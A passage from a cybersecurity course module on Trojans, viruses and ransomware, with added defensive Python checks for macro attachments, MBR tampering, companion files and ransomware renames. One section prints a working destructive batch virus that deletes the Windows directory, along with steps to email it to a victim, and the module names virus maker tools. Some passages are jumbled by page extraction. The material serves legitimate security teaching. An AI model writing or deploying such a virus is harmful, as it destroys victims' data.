61466                  Telecommando
65000                  Devil

Table 1.1: Trojans and corresponding port of attack

Types of Trojans

1. Remote Access Trojans
2. Backdoor Trojans
3. Botnet Trojans
4. Rootkit Trojans
5. E-Banking Trojans
6. Point-of-Sale Trojans
7. Defacement Trojans
8. Service Protocol Trojans
9. Mobile Trojans
10. IoT Trojans
11. Security Software Disabler Trojans
12. Destructive Trojans
13. DDoS Attack Trojans
14. Command Shell Trojans

2. Backdoor Trojans: ... the computer, such as transferring, modifying, or corrupting files, installing malicious software, and rebooting the machine, without user detection.

3. Botnet Trojans: Today, most major information security attacks involve botnets. Attackers (also known as "bot herders") use botnet Trojans to infect a large number of ...

4. Rootkit Trojans: As the name indicates, "rootkit" consists of two terms, i.e., "root" and "kit." "Root" is a UNIX/Linux term that is the equivalent of "administrator" in Windows.
The word "kit" denotes programs that allow someone to obtain root-/admin-level access to the computer by executing the programs in the kit. Rootkits are potent backdoors that specifically attack the root or OS. Unlike backdoors, rootkits cannot be detected by observing services, system task lists, or registries. Rootkits provide full control of the victim OS to the attacker.

5. E-Banking Trojans: E-banking Trojans are extremely dangerous and have emerged as a significant threat to online banking. They intercept the victim's account information before the system can encrypt it and send it to the attacker's command-and-control center. These Trojans are installed on the victim's computer when he or she clicks a malicious email attachment or a malicious advertisement. Attackers program these Trojans to steal between a minimum and a maximum monetary amount, so that they do not withdraw all the money in the account, thereby avoiding suspicion.

6. Point-of-Sale Trojans: As the name indicates, point-of-sale (POS) Trojans are a type of financial-fraud malware that targets POS and payment equipment such as credit card/debit card readers. Attackers use POS Trojans to compromise such POS equipment and grab sensitive information regarding credit cards, such as the credit card number, holder name, and CVV number.

7. Defacement Trojans: Defacement Trojans, once spread over the system, can destroy or change the entire content of a database. However, they are more dangerous when attackers target websites, as they physically change the underlying HTML, resulting in the modification of content. In addition, significant losses may be incurred due to the defacement of e-business targets by Trojans.

8. Service Protocol Trojans: These Trojans take advantage of vulnerable service protocols such as VNC, HTTP/HTTPS, and ICMP to attack the victim's machine.

9. Mobile Trojans: Mobile Trojans are malicious software that target mobile phones.
Mobile Trojan attacks are increasing rapidly due to the global proliferation of mobile phones. The attacker tricks the victim into installing the malicious application. When the victim downloads the malicious app, the Trojan performs various attacks such as banking credential stealing, social networking credential stealing, data encryption, and device locking.

10. IoT Trojans: The Internet of Things (IoT) refers to the inter-networking of physical devices, buildings, and other items embedded with electronics. IoT Trojans are malicious programs that attack IoT networks. These Trojans leverage a botnet to attack other machines outside the IoT network.

11. Security Software Disabler Trojans: Security software disabler Trojans stop the working of security programs such as firewalls and IDS, either by disabling them or by killing their processes. These are entry Trojans, which allow an attacker to perform the next level of attack on the target system.

12. Destructive Trojans: The sole purpose of a destructive Trojan is to delete files on a target system. Antivirus software may not detect destructive Trojans. Once a destructive Trojan infects a computer system, it randomly deletes files, folders, and registry entries as well as local and network drives, often resulting in OS failure.

13. DDoS Attack Trojans: These Trojans are intended to perform DDoS attacks on target machines, networks, or web addresses. They make the victim a zombie that listens for commands sent from a DDoS server on the Internet.
Numerous infected systems stand by for a command from the server. When the server sends the command to all or a group of the infected systems, they all execute it simultaneously, and the resulting flood of seemingly legitimate requests causes the target service to stop responding.

14. Command Shell Trojans: A command shell Trojan provides remote control of a command shell on a victim's machine. A Trojan server is installed on the victim's machine, which opens a port, allowing the attacker to connect. The client is installed on the attacker's machine and is used to launch a command shell on the victim's machine. Netcat, DNS Messenger, and GCat are some of the latest command shell Trojans.

Creating a Trojan

Attackers can create Trojans using various Trojan horse construction kits such as DarkHorse Trojan Virus Maker, Trojan Horse Construction Kit, and Senna Spy Trojan Generator.

Trojan horse construction kits help attackers construct Trojan horses and customize them according to their needs. These tools are dangerous and can backfire if not properly executed. New Trojans created by attackers remain undetected when scanned by virus- or Trojan-scanning tools, as they do not match any known signatures. This added benefit allows attackers to succeed in launching attacks.

Theef RAT Trojan

Theef is a Remote Access Trojan written in Delphi. It allows remote attackers access to the system via port 9871. Theef is a Windows-based application for both client and server. The Theef server is a virus that you install on a target computer, and the Theef client is what you then use to control the virus.

Figure 1.3: Screenshot of Theef RAT Trojan

Some additional Trojan horse construction kits are as follows:

- DarkHorse Trojan Virus Maker
- Trojan Horse Construction Kit
- Senna Spy Trojan Generator
- Batch Trojan Generator
- Umbra Loader - Botnet Trojan Maker
Trojan Example: Emotet

Source: https://www.fortinet.com

Emotet is a revolutionary malware that is designed with a modular architecture, where the main programs are installed first before the delivery of other payloads. It is also considered a dropper, a downloader, and a Trojan by security analysts. It is a polymorphic malware, as it can change its own identifiable features when downloaded so that it can elude signature-based detection and other antivirus programs.

Emotet is usually a banking Trojan that can function both as a Trojan by itself and as the downloader and dropper of other banking Trojans. It has been employed as a dropper/downloader for well-known banking Trojans such as Zeus Panda Banker, TrickBot, and IcedID to infect victims globally. Although it is a Trojan, Emotet has advanced persistence techniques and worm-like self-propagation abilities, which make it uniquely resilient as a destructive malware that could jeopardize individuals, companies, and government entities globally.

Spam email shown in Figure 1.4 (subject: "Receipt Confirmation #417916MV [UNSCANNED]"): "Transaction Status: Shipped! Your transaction processed successfully. It's an official confirmation for your order. Please check the invoice to update your stuff shipping day. Password to access Invoice:722. Thanks for using our service!"
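A triage check for the macro-document delivery path described above, added here and not part of the EC-Council or Fortinet material: it inspects attachment bytes for a VBA project in both the legacy OLE .doc container and the OOXML .docm container, deciding on content rather than extension. The OLE byte-scan is a heuristic of mine, not a full OLE parser, and every sample attachment is constructed.

```python
"""Triage e-mail attachments for an embedded VBA project.

Added example (not EC-Council's or Fortinet's code). The OLE byte-scan is a
heuristic, not a full OLE parser; all sample attachments are constructed.
"""
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .doc container
# OLE directory entries hold stream names as UTF-16LE and are never compressed;
# a VBA project always has a "_VBA_PROJECT" stream, so its encoded name is a
# usable marker (heuristic: an embedded OLE object can also trigger it).
VBA_STREAM_MARKER = "_VBA_PROJECT".encode("utf-16-le")
VBA_PART = "vbaProject.bin"  # fixed part name of the macro project in OOXML


def macro_indicator(data):
    """Return a short reason if the bytes carry a VBA project, else None.
    The decision is made on content, never on the file extension."""
    if data.startswith(OLE_MAGIC):
        if VBA_STREAM_MARKER in data:
            return "legacy OLE document with _VBA_PROJECT stream"
        return None
    if data.startswith(b"PK"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                names = z.namelist()
        except zipfile.BadZipFile:
            return None
        for name in names:
            if name.endswith(VBA_PART):
                return "OOXML package contains " + name
    return None


def triage_attachments(attachments):
    """attachments: {filename: bytes} -> {filename: reason} for macro carriers."""
    result = {}
    for name, data in attachments.items():
        reason = macro_indicator(data)
        if reason is not None:
            result[name] = reason
    return result


def _ooxml(parts):
    """Build a minimal OOXML-style zip from {part name: bytes} (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, body in parts.items():
            z.writestr(name, body)
    return buf.getvalue()


def _ole(streams):
    """Fake OLE header followed by UTF-16LE stream names (constructed)."""
    body = b"".join(s.encode("utf-16-le") + b"\x00" * 32 for s in streams)
    return OLE_MAGIC + b"\x00" * 504 + body


# Constructed samples: a macro-carrying invoice .doc like the lure in Figure 1.5,
# a macro-enabled OOXML file renamed to .doc, and clean files for comparison.
SAMPLE_ATTACHMENTS = {
    "invoice.doc": _ole(["WordDocument", "Macros", "VBA", "_VBA_PROJECT", "ThisDocument"]),
    "quote.doc": _ole(["WordDocument", "1Table", "SummaryInformation"]),
    "report.doc": _ooxml({"[Content_Types].xml": b"<Types/>",
                          "word/document.xml": b"<w:document/>",
                          "word/vbaProject.bin": b"\x00" * 16}),
    "letter.docx": _ooxml({"[Content_Types].xml": b"<Types/>",
                           "word/document.xml": b"<w:document/>"}),
    "notes.txt": b"plain text, nothing to see",
}

if __name__ == "__main__":
    for name, reason in triage_attachments(SAMPLE_ATTACHMENTS).items():
        print("%-12s %s" % (name, reason))
```

A hit means the document can run code once the user clicks "Enable content"; it says nothing about what the macro does, which is the job of a sandbox or a VBA extractor.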
Figure 1.4: Spam email with malicious content distributing Emotet

Text of the document shown in Figure 1.5: "To open the document, follow these steps: This document is only available for desktop or laptop versions of Microsoft Office Word. Click Enable editing button from the yellow bar above. Once you have enabled editing, please click Enable content button from the yellow bar above."

Figure 1.5: Malicious Word document used for installing Emotet

Viruses

What is a Virus?

Viruses are the scourge of modern computing. Computer viruses have the potential to wreak havoc on both business and personal computers. The lifetime of a virus depends on its ability to reproduce itself. Therefore, attackers design every virus code such that the virus replicates itself n times.
A computer virus is a self-replicating program that produces its code by attaching copies of itself to other executable code and operates without the knowledge or consent of the user. Like a biological virus, a computer virus is contagious and can contaminate other files; however, viruses can infect external machines only with the assistance of computer users.

A virus reproduces its own code by attaching itself to other executables and spreads throughout the computer. Viruses can spread the infection by damaging files in a file system. Some viruses reside in memory and may infect programs through the boot sector. A virus can also be in an encrypted form. Some viruses affect computers as soon as their code is executed; other viruses remain dormant until a pre-determined logical condition is met. Viruses infect a variety of files, such as overlay files (.OVL) and executable files (.EXE, .SYS, .COM, or .BAT). They are transmitted through file downloads, infected disk/flash drives, and email attachments.

A virus can only spread from one PC to another when its host program is transmitted to the uninfected computer. This can occur, for example, when a user transmits it over a network or executes it from removable media. Viruses are sometimes confused with worms, which are standalone programs that can spread to other computers without a host. A majority of PCs are now connected to the Internet and to local area networks, which aids in increasing their spread.

Characteristics of Viruses

The performance of a computer is affected by a virus infection. This infection can lead to data loss, system crash, and file corruption.
Some of the characteristics of a virus are as follows:

- Infects other programs
- Transforms itself
- Encrypts itself
- Alters data
- Corrupts files and programs
- Replicates itself

Purpose of Creating Viruses

Attackers create viruses with disreputable motives. Criminals create viruses to destroy a company's data, as an act of vandalism, or to destroy a company's products; however, in some cases, viruses aid the system. An attacker creates a virus for the following purposes:

- Inflict damage on competitors
- Realize financial benefits
- Vandalize intellectual property
- Play pranks
- Conduct research
- Engage in cyber-terrorism
- Distribute political messages
- Damage networks or computers
- Gain remote access to a victim's computer
Indications of Virus Attack

Indications of virus attacks arise from abnormal activities. Such activities reflect the nature of a virus by interrupting the regular flow of a process or a program. However, not every anomaly indicates an attack on the system; some are merely false positives. For example, if the system runs slower than usual, one may assume that a virus has infected the system; however, the actual reason might be program overload.

An effective virus tends to multiply rapidly and may infect many machines in a short period. Viruses can infect files on the system, and when such files are transferred, they can infect the machines of other users who receive them. A virus can also use file servers to infect files. When a virus infects a computer, the victim or user will be able to identify some indications of the presence of the infection. Some indications of computer virus infection are as follows:

- Processes require more resources and time, resulting in degraded performance
- Computer beeps with no display
- Drive label changes and OS does not load
- Constant antivirus alerts
- Computer freezes frequently or encounters an error such as BSOD
- Files and folders are missing
- Suspicious hard drive activity
- Browser window "freezes"
- Lack of storage space
- Unwanted advertisements and pop-up windows
- Unable to open files in the system
- Strange emails received
Stages of Virus Lifecycle

The virus lifecycle includes the following six stages from origin to elimination.

1. Design: Development of virus code using programming languages or construction kits.
2. Replication: The virus replicates for a period within the target system and then spreads itself.
3. Launch: The virus is activated when the user performs specific actions such as running an infected program.
4. Detection: The virus is identified as a threat infecting the target system.
5. Incorporation: Antivirus software developers assimilate defenses against the virus.
6. Execution of the damage routine: Users install antivirus updates and eliminate the virus threats.
How does a Computer Get Infected by Viruses?

To infect a system, a virus first has to enter it. Once the user downloads and installs the virus from any source and in any form, it replicates itself to other programs. The virus can infect the computer in various ways, some of which are listed below:

- Downloads: Attackers incorporate viruses in popular software programs and upload them to websites intended for download. When a user unknowingly downloads this infected software and installs it, the system is infected.
- Email attachments: Attackers usually send virus-infected files as email attachments to spread the virus on the victim's system. When the victim opens the malicious attachment, the virus automatically infects the system.
- Pirated software: Installing cracked versions of software (OS, Adobe, Microsoft Office, etc.) might infect the system, as they may contain viruses.
- Failing to install security software: As security measures improve, attackers design new viruses. Failing to install the latest antivirus software or to update it regularly may expose the computer system to virus attacks.
- Updating software: If patches are not installed when released by vendors, viruses might exploit vulnerabilities, thereby allowing an attacker to access the system.
- Browser: By default, every browser comes with built-in security. An incorrectly configured browser could result in the automatic running of scripts, which may, in turn, allow viruses to enter the system.
- Firewall: Disabling the firewall will compromise the security of network traffic and invite viruses to infect the system.
- Pop-ups: When the user clicks any suspicious pop-up by mistake, the virus hidden behind the pop-up enters the system. Whenever the user turns on the system, the installed virus code will run in the background.
- Removable media: When a healthy system is connected to virus-infected removable media (e.g., DVD, USB drive, card reader), the virus spreads to the system.
- Network access: Connecting to an untrusted Wi-Fi network, leaving Bluetooth ON, or permitting a file-sharing program that is openly accessible will allow a virus to take over the device.
- Backup and restore: Taking a backup of an infected file and restoring it to a system infects the system again with the same virus.
- Malicious online ads: Attackers post malicious online ads by embedding malicious code in the ads, also known as malvertising. Once users click these ads, their computers get infected.
- Social media: People tend to click links on social media sites, including malicious links shared by their contacts, which can infect their systems.

Types of Viruses

Viruses are categorized according to their functioning and targets. Some examples include:

- System or Boot Sector Virus
- File and Multipartite Virus
- Macro and Cluster Virus
- Stealth/Tunneling Virus
- Encryption Virus
- Sparse Infector Virus
- Polymorphic Virus
- Metamorphic Virus
- Overwriting File or Cavity Virus
- Companion/Camouflage Virus
- Shell and File Extension Virus
- FAT and Logic Bomb Virus
- Web Scripting Virus
- Email and Armored Virus
- Add-on and Intrusive Virus
- Direct Action or Transient Virus
- Terminate & Stay Resident Virus
Types of Viruses Viruses are categories according to their functioning and targets. Some of the most common types of computer viruses that adversely affect the security of systems are listed below: 1. System or Boot Sector Virus: The most common targets for a virus are the system sectors, which include the master boot record (MBR) and the DOS boot record system sectors. The primary carriers of system or boot sector viruses are email attachments and removable media (USB drives). A boot sector virus moves MBR to another location on the hard disk and copies itself to the original location of MBR. When the system boots, first, the virus code executes and then control passes to the original MBR. 2. File Virus: File viruses infect files executed or interpreted in the system, such as COM, EXE, SYS, OVL, OBJ, PRG, MNU, and BAT files. File viruses can be direct-action (non- resident) or memory-resident viruses. File viruses insert their code into the original file and infect executable files. Such viruses are numerous, albeit rare. They infect in a variety of ways and are found in numerous file types. 3. Multipartite Virus: A multipartite virus (also known as a multipart virus or hybrid virus) combines the approach of file infectors and boot record infectors and attempts to simultaneously attack both the boot sector and the executable or program files. When the virus infects the boot sector, it will, in turn, affect the system files and vice versa. This type of virus re-infects a system repeatedly if it is not rooted out entirely from the target Tequila. 4. machine. Some examples of multipartite viruses include Invader, Flip, and Macro Virus: Macro viruses infects Microsoft Word or similar applications by automatically performing a sequence of actions after triggering an application. Most Module 01 Page 57 Certified Cybersecurity Technician Copyright © by EG-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. 
macro viruses are written using the macro language Visual Basic for Applications (VBA), and they infect templates or convert infected documents into template files while maintaining their appearance of common document files.

5. Cluster Virus: Cluster viruses infect files without changing the file or planting additional files. They save the virus code to the hard drive and overwrite the pointer in the directory entry, directing the disk read point to the virus code instead of the actual program. Even though the changes in the directory entry may affect all the programs, only one copy of the virus exists on the disk.

6. Stealth/Tunneling Virus: These viruses try to hide from antivirus programs by actively altering and corrupting the service call interrupts while running. The virus code replaces the requests to perform operations with respect to these service call interrupts. These viruses state false information to hide their presence from antivirus programs. For example, a stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code.

7. Encryption Virus: Encryption viruses or cryptolocker viruses penetrate the target system via freeware, shareware, codecs, fake advertisements, torrents, email spam, and so on. This type of virus consists of an encrypted copy of the virus and a decryption module. The decryption module remains constant, whereas the encryption makes use of different keys.

8. Sparse Infector Virus: To spread infection, viruses typically attempt to hide from antivirus programs. Sparse infector viruses infect less often and try to minimize their probability of discovery. These viruses infect only occasionally upon satisfying certain conditions or infect only those files whose lengths fall within a narrow range.
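As an added example (not part of the course text), the following Python shows the defender's side of the boot sector virus described in item 1 above: it parses a 512-byte MBR image, verifies the 0x55AA boot signature, decodes the partition table, and compares a hash of the 446-byte boot code against a baseline taken from a known-clean disk, which is how a relocated or replaced MBR shows up in an integrity check. The sample MBR bytes are constructed inside the code, and the function names (build_sample_mbr, parse_mbr, check_mbr_against_baseline) are my own choices.

```python
import hashlib
import struct

MBR_SIZE = 512
BOOT_CODE_LEN = 446           # bytes 0..445 hold the boot code
PARTITION_TABLE_OFFSET = 446  # four 16-byte partition entries follow
SIGNATURE_OFFSET = 510        # last two bytes must be 0x55 0xAA
ENTRY_FMT = "<B3sB3sII"       # status, CHS start, type, CHS end, LBA start, sector count


def build_sample_mbr(boot_code: bytes) -> bytes:
    """Construct a 512-byte MBR image for this example (constructed sample, not a real disk)."""
    if len(boot_code) > BOOT_CODE_LEN:
        raise ValueError("boot code too long")
    mbr = bytearray(MBR_SIZE)
    mbr[:len(boot_code)] = boot_code
    # one bootable NTFS-type (0x07) primary partition starting at LBA 2048
    entry = struct.pack(ENTRY_FMT, 0x80, b"\x00\x00\x00", 0x07, b"\x00\x00\x00", 2048, 1_000_000)
    mbr[PARTITION_TABLE_OFFSET:PARTITION_TABLE_OFFSET + 16] = entry
    mbr[SIGNATURE_OFFSET:] = b"\x55\xAA"
    return bytes(mbr)


def parse_mbr(mbr: bytes) -> dict:
    """Decode the signature, the partition table and a hash of the boot code."""
    if len(mbr) != MBR_SIZE:
        raise ValueError("an MBR is exactly 512 bytes")
    partitions = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + i * 16
        status, _chs_s, ptype, _chs_e, lba_start, sectors = struct.unpack(ENTRY_FMT, mbr[off:off + 16])
        if ptype == 0:  # empty entry
            continue
        partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                           "lba_start": lba_start, "sectors": sectors})
    return {
        "signature_ok": mbr[SIGNATURE_OFFSET:] == b"\x55\xAA",
        "boot_code_sha256": hashlib.sha256(mbr[:BOOT_CODE_LEN]).hexdigest(),
        "partitions": partitions,
    }


def check_mbr_against_baseline(mbr: bytes, baseline_boot_code_sha256: str) -> list:
    """Return a list of findings; an empty list means the MBR matches the clean baseline."""
    info = parse_mbr(mbr)
    findings = []
    if not info["signature_ok"]:
        findings.append("missing 0x55AA boot signature")
    if info["boot_code_sha256"] != baseline_boot_code_sha256:
        findings.append("boot code differs from baseline")
    bootable = [p for p in info["partitions"] if p["bootable"]]
    if len(bootable) != 1:
        findings.append(f"expected one bootable partition, found {len(bootable)}")
    return findings


if __name__ == "__main__":
    clean = build_sample_mbr(b"\xEB\x3C\x90" + b"\x90" * 40)     # baseline from a clean disk
    baseline = parse_mbr(clean)["boot_code_sha256"]
    tampered = build_sample_mbr(b"\xE9\x00\x01" + b"\xCC" * 40)  # boot code replaced
    print(check_mbr_against_baseline(clean, baseline))     # []
    print(check_mbr_against_baseline(tampered, baseline))  # ['boot code differs from baseline']
```

On a real system the 512 bytes would be read from the raw disk device (for example the first sector of /dev/sda) rather than constructed, and the baseline hash would be stored off-host so that a virus that relocates the MBR cannot also rewrite the reference value.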
9. Polymorphic Virus: Such viruses infect a file with an encrypted copy of a polymorphic code already decoded by a decryption module. Polymorphic viruses modify their code for each replication to avoid detection. They accomplish this by changing the encryption module and the instruction sequence. Polymorphic mechanisms use random number generators in their implementation.

10. Metamorphic Virus: Metamorphic viruses are programmed such that they rewrite themselves completely each time they infect a new executable file. Such viruses are sophisticated and use metamorphic engines for their execution. Metamorphic code reprograms itself. It is translated into temporary code (a new variant of the same virus but with different code) and then converted back into the original code. This technique, in which the original algorithm remains intact, is used to avoid pattern recognition by antivirus software. Metamorphic viruses are more effective than polymorphic viruses.

11. Overwriting File or Cavity Virus: Some programs have empty spaces in them. Cavity viruses, also known as space fillers, overwrite a part of the host file with a constant (usually nulls), without increasing the length of the file while preserving its functionality. Maintaining a constant file size when infecting allows the virus to avoid detection. Cavity viruses are rarely found due to the unavailability of hosts and code complexity.

12. Companion Virus/Camouflage Virus: The companion virus stores itself with the same filename as the target program file. The virus infects the computer upon executing the file, and it modifies the hard disk data. Companion viruses use DOS to run COM files before the execution of EXE files. The virus installs an identical COM file and infects EXE files.
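The companion virus in item 12 relies on the order in which COMMAND.COM resolves a name typed without an extension (.COM before .EXE before .BAT). As an added example, not taken from the course text, the Python below turns that fact into a simple screening check: it lists the files in a directory and reports every pair where a file that wins the search order sits beside a same-named file that loses it. The sample directory is constructed in a temporary folder inside the code, and the names find_companion_candidates, scan_directory and demo are my own.

```python
import os
import tempfile
from collections import defaultdict

# Order in which COMMAND.COM resolves a name typed without an extension: a
# PROGRAM.COM dropped beside PROGRAM.EXE therefore runs in place of the EXE.
DOS_SEARCH_ORDER = (".com", ".exe", ".bat")


def find_companion_candidates(filenames):
    """Return (shadowing_file, shadowed_file) pairs: a file that wins the DOS
    search order sitting beside a same-named file that loses it."""
    by_stem = defaultdict(dict)  # lower-cased stem -> {extension: original name}
    for name in filenames:
        stem, ext = os.path.splitext(name)
        ext = ext.lower()
        if ext in DOS_SEARCH_ORDER:
            by_stem[stem.lower()][ext] = name
    findings = []
    for variants in by_stem.values():
        present = [ext for ext in DOS_SEARCH_ORDER if ext in variants]
        if len(present) < 2:
            continue
        winner = variants[present[0]]
        findings.extend((winner, variants[ext]) for ext in present[1:])
    return sorted(findings)


def scan_directory(path):
    """Apply the check to one directory (non-recursive)."""
    return find_companion_candidates(os.listdir(path))


def demo():
    """Constructed sample directory: game.com beside GAME.EXE is the companion
    candidate; setup.bat beside SETUP.EXE is merely shadowed by the EXE."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("GAME.EXE", "game.com", "README.TXT", "tool.exe", "setup.bat", "SETUP.EXE"):
            open(os.path.join(d, name), "wb").close()
        return scan_directory(d)


if __name__ == "__main__":
    for shadowing, shadowed in demo():
        print(f"{shadowing} runs before {shadowed}")
```

The check is a triage heuristic rather than a verdict: legitimate software occasionally ships a .COM launcher next to an .EXE, so each reported pair still needs the .COM file's hash or signature examined before it is treated as an infection.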
13. Shell Virus: The shell virus code forms a shell around the target host program's code, making itself the original program with the host code as its sub-routine. Nearly all boot program viruses are shell viruses.

14. File Extension Virus: File extension viruses change the extensions of files. The extension .TXT is safe as it indicates a pure text file. With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you will only see BAD.TXT. If you have forgotten that extensions are turned off, you might think that this is a text file and open it. It actually is an executable Visual Basic Script virus file and could cause severe damage.

15. FAT Virus: A FAT virus is a computer virus that attacks the File Allocation Table (FAT), a system used in Microsoft products and some other types of computer systems to access the information stored on a computer. By attacking the FAT, a virus can cause severe damage to a computer. FAT viruses can work in a variety of ways. Some are designed to embed themselves into files so that when the FAT accesses the file, the virus is triggered. Others may attack the FAT directly.

16. Logic Bomb Virus: A logic bomb is a virus that is triggered in response to an event, such as the launching of an application or a specific date/time being reached, where it involves logic to execute the trigger. When a logic bomb is programmed to execute on a specific date, it is referred to as a time bomb. Time bombs are usually programmed to set off when important dates are reached, such as Christmas and Valentine's Day.

17. Web Scripting Virus: A web scripting virus is a type of computer security vulnerability that breaches your web browser security through a website. This allows attackers to inject client-side scripting into the web page. It can bypass access controls and steal information from the web browser.
Web scripting viruses are usually used to attack sites with large populations, such as sites for social networking, user reviews, and email.

18. Email Virus: An e-mail virus refers to computer code sent to you as an e-mail attachment, which, if activated, will result in some unexpected and usually harmful effects, such as destroying specific files on your hard disk and causing the attachment to be emailed to everyone in your address book. Email viruses perform a wide variety of activities, from creating pop-ups to crashing systems or stealing personal data.

19. Armored Virus: Armored viruses are viruses that are designed to confuse or trick deployed antivirus systems to prevent them from detecting the actual source of the infection. These viruses make it difficult for antivirus programs to trace the actual source of the attack. They trick antivirus programs by showing some other location even though they are actually on the system itself.

20. Add-on Virus: Add-on viruses append their code to the host code without making any changes to the latter, or relocate the host code to insert their code at the beginning.

21. Intrusive Virus: Intrusive viruses overwrite the host code completely or partly with the viral code.

22. Direct Action or Transient Virus: Direct action or transient viruses transfer all control of the host code to where it resides in the memory. The virus selects the target program to be modified and corrupts it. The life of a transient virus is directly proportional to the life of its host. Therefore, a transient virus executes only upon the execution of its attached program and terminates upon the termination of its attached program. At the time of execution, the virus may spread to other programs.
This virus is transient or direct, as it operates only for a short period and goes directly to the disk to search for programs to infect.

23. Terminate and Stay Resident Virus (TSR): A terminate and stay resident (TSR) virus remains permanently in the target machine's memory during an entire work session, even after the target host's program is executed and terminated. The TSR virus remains in memory and therefore has some control over the processes.

Creating a Virus

A virus can be created in two ways: writing a virus program, and using virus maker tools.

Writing a Simple Virus Program

The following steps are involved in writing a simple virus program:

1. Create a batch file Game.bat with the following text:
@ echo off
for %%f in (*.bat) do copy %%f + Game.bat
del c:\Windows\*.*

2. Convert the Game.bat batch file into Game.com using the bat2com utility
3. Send the Game.com file as an email attachment to the victim
4. When Game.com is executed by the victim, it copies itself to all the .bat files in the current directory on the target machine and deletes all the files in the Windows directory

Using Virus Maker Tools

Virus maker tools allow you to customize and craft your virus into a single executable file. The nature of the virus depends on the options available in the virus maker tool. Once the virus file is built and executed, it can perform the following tasks:
- Disable Windows command prompt and Windows Task Manager
- Shut down the system
- Infect all executable files
- Inject itself into the Windows registry and start up with Windows
- Perform non-malicious activity such as unusual mouse and keyboard actions

The following tools are useful for testing the security of your own antivirus software.

DELmE's Batch Virus Maker

DELmE's Batch Virus Generator is a virus creation program with many options to infect the victim's PC, such as formatting the C: drive, deleting all the files in the hard disk drive, disabling admin privileges, cleaning the registry, changing the home page, killing tasks, and disabling/removing the antivirus and firewall.
Figure 1.6: Screenshot of DELmE's Batch Virus Maker

JPS Virus Maker

JPS Virus Maker tool is used to create customized viruses. It has many in-built options to create a virus. Some of the features of this tool are auto-startup, disable task manager, disable control panel, enable remote desktop, turn off Windows Defender, etc.
Figure 1.7: Working of JPS Virus Maker

Some additional virus maker tools are as follows:
- Bhavesh Virus Maker SKW
- Deadly Virus Maker
- SonicBat Batch Virus Maker
- TeraBIT Virus Maker
- Andreinick05's Batch Virus Maker
Ransomware

Ransomware is a type of malware that restricts access to the infected computer system or critical files and documents stored on it, and then demands an online ransom payment to the malware creator(s) to remove user restrictions. Ransomware is a type of crypto-malware that might encrypt files stored on the system's hard disk or merely lock the system and display messages meant to trick the user into paying the ransom.

Usually, ransomware spreads as a Trojan, entering a system through email attachments, hacked websites, infected programs, app downloads from untrusted sites, vulnerabilities in network services, and so on. After execution, the payload in the ransomware runs and encrypts the victim's data (files and documents), which can be decrypted only by the malware author. In some cases, user interaction is restricted using a simple payload. In a web browser, a text file or webpage displays the ransomware demands.
The displayed messages appear to be from companies or law enforcement personnel falsely claiming that the victim's system is being used for illegal purposes or contains illegal content (e.g., porn videos, pirated software), or it could be a Microsoft product activation notice falsely claiming that installed Office software is fake and requires product re-activation. These messages entice victims into paying money to undo the restrictions imposed on them. Ransomware leverages victims' fear, trust, surprise, and embarrassment to get them to pay the ransom demanded.

Figure 1.8: Depiction of ransomware attack (attacker attaches ransomware to an e-mail; the malware executes and gets installed; files get encrypted and access is blocked while a ransom is demanded; the victim pays the ransom; the attacker unlocks the files and the victim regains access)

Ransomware Families

Listed below are some of the ransomware families:
- Cerber
- CryptorBit
- CTB-Locker
- CryptoLocker
- Sodinokibi
- CryptoDefense
- BitPaymer
- CryptXXX
- CryptoWall
- Police-themed Ransomware

Examples of Ransomware

Dharma

Dharma is a dreadful ransomware that was first identified in 2016; since then, it has been affecting various targets across the globe with new versions. It has been regularly updated with sophisticated mechanisms in recent years. At the end of March 2019, Dharma struck a parking lot system in Canada. Previously, it also infected a Texas hospital and some other organizations. The variants of this ransomware have the following extensions: .adobe, .bip, .combo, .cezar, .ETH, .java. Its encrypted files have new extensions, such as .xxxxx and .like. This ransomware employs an AES encryption algorithm to encrypt data and then displays ransom notes. These ransom notes are
named either Info.hta or FILES ENCRYPTED.txt. This ransomware is distributed through email campaigns. The ransom notes ask victims to contact the threat actors via the provided email address and pay in bitcoins for the decryption service.

Figure 1.9: Screenshot displaying ransom demand message of Dharma ransomware

Some additional ransomware are as follows:
- eChOraix
- MegaCortex
- SamSam
- LockerGoga
- WannaCry
- NamPoHyu
- Petya - NotPetya
- GandCrab
- Ryuk
- CryptghOst
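Two of the behaviours described for Dharma above, mass renaming of files to a new extension and the dropping of ransom notes named Info.hta or FILES ENCRYPTED.txt, are the basis of most host-side ransomware detection. As an added example, not part of the course text, the Python below runs both rules over a constructed list of file-system audit events (one benign rename, a burst of renames to .adobe, and one ransom note creation). The event format, the thresholds, the process names and the id-PLACEHOLDER tag in the sample filenames are my assumptions; the function names detect_mass_rename, detect_ransom_notes and run_detection are my own.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Ransom note filenames named in the text for Dharma; extend the set for other families.
RANSOM_NOTE_NAMES = {"info.hta", "files encrypted.txt"}
RENAME_THRESHOLD = 5            # distinct files renamed to one new extension ...
WINDOW = timedelta(seconds=60)  # ... within this window by a single process


def base_name(path: str) -> str:
    """Last path component, accepting both Windows and POSIX separators."""
    return re.split(r"[\\/]", path)[-1]


def extension(path: str) -> str:
    name = base_name(path)
    return name[name.rfind("."):].lower() if "." in name else ""


def detect_mass_rename(events):
    """Flag a process that renames many distinct files to the same new extension within WINDOW."""
    per_key = defaultdict(list)  # (process, new extension) -> [(timestamp, source path)]
    for ev in events:
        if ev["action"] != "rename":
            continue
        new_ext = extension(ev["dst"])
        if new_ext and new_ext != extension(ev["src"]):
            per_key[(ev["process"], new_ext)].append((datetime.fromisoformat(ev["ts"]), ev["src"]))
    alerts = []
    for (proc, ext), items in per_key.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            in_window = {src for ts, src in items[i:] if ts - start <= WINDOW}
            if len(in_window) >= RENAME_THRESHOLD:
                alerts.append({"rule": "mass-rename", "process": proc, "new_ext": ext, "count": len(in_window)})
                break
    return alerts


def detect_ransom_notes(events):
    """Flag creation of files whose names match known ransom notes."""
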